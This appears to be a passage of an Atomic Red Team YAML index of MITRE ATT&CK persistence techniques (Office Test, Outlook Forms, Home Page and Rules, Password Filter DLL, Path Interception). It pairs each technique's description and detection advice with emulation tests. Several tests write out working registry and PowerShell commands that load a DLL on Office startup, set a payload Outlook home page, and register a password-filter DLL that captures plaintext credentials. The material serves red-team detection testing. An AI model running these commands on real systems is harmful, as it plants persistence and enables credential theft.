x_mitre_detection: 'Many Office-related persistence mechanisms require changes + to the Registry and for binaries, files, or scripts to be written to disk + or existing files modified to include malicious scripts. Collect events related + to Registry key creation and modification for keys that could be used for + Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook + Today Home Page) Modification to base templates, like Normal.dotm, should + also be investigated since the base templates should likely not contain VBA + macros. Changes to the Office macro security settings should also be investigated.(Citation: + GlobalDotName Jun 2019)' + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1137.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.002 + url: https://attack.mitre.org/techniques/T1137/002 + - url: http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/ + description: Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. + Retrieved July 3, 2017. + source_name: Hexacorn Office Test + - url: https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ + description: 'Falcone, R. (2016, July 20). Technical Walkthrough: Office Test + Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.' + source_name: Palo Alto Office Test Sofacy + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Office Test + description: |- + Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) + + There exist user and global Registry keys for the Office Test feature: + + * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf + * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf + + Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. + id: attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-20T15:27:51.559Z' + created: '2019-11-07T19:44:04.475Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_system_requirements: + - Office 2007, 2010, 2013, and 2016 + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy) + + Consider monitoring Office processes for anomalous DLL loads. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + - Office 365 + identifier: T1137.002 + atomic_tests: + - name: Office Application Startup Test Persistence + auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 + description: | + Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office + application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. + supported_platforms: + - windows + input_arguments: + thing_to_execute: + description: Thing to Run + type: Path + default: C:\Path\AtomicRedTeam.dll + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" + /t REG_SZ /d "#{thing_to_execute}" + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office + test\Special\Perf" + +' + name: command_prompt + T1137.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.003 + url: https://attack.mitre.org/techniques/T1137/003 + - source_name: SensePost Outlook Forms + url: https://sensepost.com/blog/2017/outlook-forms-and-shells/ + description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved + February 4, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Outlook Forms + description: |- + Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms) + + Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms) + id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:35:15.823Z' + created: '2019-11-07T20:06:02.624Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1137.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.004 + url: https://attack.mitre.org/techniques/T1137/004 + - source_name: SensePost Outlook Home Page + url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/ + description: Stalmans, E. (2017, October 11). Outlook Home Page – Another + Ruler Vector. Retrieved February 4, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Outlook Home Page + description: | + Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) + + Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) + id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:35:51.656Z' + created: '2019-11-07T20:09:56.536Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Windows + - Office 365 + identifier: T1137.004 + atomic_tests: + - name: Install Outlook Home Page Persistence + auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e + description: | + This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. + + Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + supported_platforms: + - windows + input_arguments: + url: + description: URL to Outlook Home Page containing the payload to execute + (can be local file:// or remote https://) + type: string + default: file://PathToAtomicsFolder\T1137.004\src\T1137.004.html + outlook_version: + description: Version of Outlook that is installed + type: string + default: 16.0 + outlook_folder: + description: Name of the Outlook folder to modify the homepage setting for + type: string + default: Inbox + executor: + name: command_prompt + elevation_required: false + command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} + /v URL /t REG_SZ /d #{url} /f + +' + cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} + /v URL /f + +' + T1137.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1137.005 + url: https://attack.mitre.org/techniques/T1137/005 + - source_name: SilentBreak Outlook Rules + url: https://silentbreaksecurity.com/malicious-outlook-rules/ + description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved + February 4, 2019. + - source_name: Microsoft Detect Outlook Forms + url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack + description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook + Rules and Custom Forms Injections Attacks in Office 365. Retrieved February + 4, 2019. + - source_name: SensePost NotRuler + url: https://github.com/sensepost/notruler + description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, + provides blue teams with the ability to detect Ruler usage against Exchange. + Retrieved February 4, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Outlook Rules + description: |- + Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules) + + Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules) + id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-26T17:36:15.923Z' + created: '2019-11-07T20:00:25.560Z' + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) + + Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1556.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1556.002 + url: https://attack.mitre.org/techniques/T1556/002 + - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html + description: Fuller, R. (2013, September 11). Stealing passwords every time + they change. Retrieved November 21, 2017. + source_name: Carnal Ownage Password Filters Sept 2013 + - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ + description: Bialek, J. (2013, September 15). Intercepting Password Changes + With Function Hooking. Retrieved November 21, 2017. + source_name: Clymb3r Function Hook Passwords Sept 2013 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Password Filter DLL + description: "Adversaries may register malicious password filter dynamic link + libraries (DLLs) into the authentication process to acquire user credentials + as they are validated. \n\nWindows password filters are password policy enforcement + mechanisms for both domain and local accounts. Filters are implemented as + DLLs containing a method to validate potential passwords against password + policies. Filter DLLs can be positioned on local computers for local accounts + and/or domain controllers for domain accounts. Before registering new passwords + in the Security Accounts Manager (SAM), the Local Security Authority (LSA) + requests validation from each registered filter. Any potential changes cannot + take effect until every registered filter acknowledges validation. \n\nAdversaries + can register malicious password filters to harvest credentials from local + computers and/or entire domains. To perform proper validation, filters must + receive plain-text credentials from the LSA. A malicious password filter would + receive these plain-text credentials every time a password request is made.(Citation: + Carnal Ownage Password Filters Sept 2013)" + id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:55.147Z' + created: '2020-02-11T19:05:45.829Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_contributors: + - Vincent Le Toux + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. + + Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1556.002 + atomic_tests: + - name: Install and Register Password Filter DLL + auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c + description: 'Uses PowerShell to install and register a password filter DLL. + Requires a reboot and administrative privileges. + +' + supported_platforms: + - windows + input_arguments: + input_dll: + description: Path to DLL to be installed and registered + type: Path + default: PathToAtomicsFolder\T1556.002\src\AtomicPasswordFilter.dll + dependency_executor_name: powershell + dependencies: + - description: 'AtomicPasswordFilter.dll must exist on disk at specified location + (#{input_dll}) + +' + prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} + +' + get_prereq_command: 'Write-Host "You must provide your own password filter + dll" + +' + executor: + command: | + $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename + $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" + $notificationPackagesValues = $lsaKey.GetValue("Notification Packages") + $notificationPackagesValues += $passwordFilterName + Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues + Restart-Computer -Confirm + name: powershell + elevation_required: true + T1034: + technique: + id: attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception + description: |- + **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** + + Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019) + + There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. + + ### Unquoted Paths + Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018) + + ### PATH Environment Variable Misconfiguration + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + + ### Search Order Hijacking + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). + external_references: + - source_name: mitre-attack + external_id: T1034 + url: https://attack.mitre.org/techniques/T1034 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/ + description: Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking + via .cmd or .bat file. Retrieved July 25, 2016. + source_name: TechNet MS14-019 + - url: http://support.microsoft.com/KB/103000 + description: Microsoft. (n.d.). CurrentControlSet\Services Subkey Entries. + Retrieved November 30, 2014. + source_name: Microsoft Subkey + - url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Baggett, M. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved December 4, 2014. + source_name: Baggett 2012 + - url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + source_name: SecurityBoulevard Unquoted Services APR 2018 + - url: https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: McFarland, R. (2018, January 26). Windows Privilege Escalation + Guide. Retrieved August 10, 2018. + source_name: SploitSpren Windows Priv Jan 2018 + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - url: http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120 + description: Hill, T. (n.d.). Windows NT Command Shell. Retrieved December + 5, 2014. + source_name: Hill NT Shell + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - url: https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx + description: Microsoft. (n.d.). Environment Property. Retrieved July 27, 2016. + source_name: MSDN Environment Property + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + revoked: false + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-07-06T18:49:35.645Z' + created: '2017-05-31T21:30:36.140Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + x_mitre_permissions_required: + - User + - Administrator + - SYSTEM + x_mitre_effective_permissions: + - User + - Administrator + - SYSTEM + x_mitre_detection: "Monitor file creation for files named after partial directories + and in locations that may be searched for common processes through the environment + variable, or otherwise should not be user writable. Monitor the executing + process for process executable paths that are named for partial directories. + Monitor file creation for programs that are named after Windows system programs + or programs commonly executed without a path (such as \"findstr,\" \"net,\" + and \"python\"). If this activity occurs outside of known administration activity, + upgrades, installations, or patches, then it may be suspicious. \n\nData and + events should not be viewed in isolation, but as part of a chain of behavior + that could lead to other activities, such as network connections made for + Command and Control, learning details about the environment through Discovery, + and Lateral Movement." + x_mitre_contributors: + - Stefan Kanthak + x_mitre_version: '1.0' + x_mitre_deprecated: true + atomic_tests: [] + T1574.007: + technique: + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable + description: |- + Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. + + The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. + + For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1574.008: + technique: + id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 + description: |- + Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. + + Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. + + For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property) + + Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + name: Path Interception by Search Order Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.008 + url: https://attack.mitre.org/techniques/T1574/008 + - external_id: CAPEC-159 + source_name: capec + url: https://capec.mitre.org/data/definitions/159.html + - url: http://msdn.microsoft.com/en-us/library/ms682425 + description: Microsoft. (n.d.). CreateProcess function. Retrieved December + 5, 2014. + source_name: Microsoft CreateProcess + - source_name: Windows NT Command Shell + url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 + description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved + December 5, 2014. + - url: http://msdn.microsoft.com/en-us/library/ms687393 + description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014. + source_name: Microsoft WinExec + - source_name: Microsoft Environment Property + url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN + description: Microsoft. (2011, October 24). Environment Property. Retrieved + July 27, 2016. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Stefan Kanthak + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: | + Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. + + Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - User + - SYSTEM + x_mitre_effective_permissions: + - Administrator + - SYSTEM + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1574.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.009 + url: https://attack.mitre.org/techniques/T1574/009 + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + - source_name: Microsoft CurrentControlSet Services + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree + description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services + Registry Tree. Retrieved March 16, 2020. + - source_name: Help eliminate unquoted path + url: https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464 + description: Mark Baggett. (2012, November 8). Help eliminate unquoted path + vulnerabilities. Retrieved November 8, 2012. + - source_name: Windows Unquoted Services + url: https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ + description: HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted + Services. Retrieved August 10, 2018. + - source_name: Windows Privilege Escalation Guide + url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ + description: absolomb. (2018, January 26). Windows Privilege Escalation Guide. + Retrieved August 10, 2018. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by Unquoted Path + description: |- + Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. + + Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and 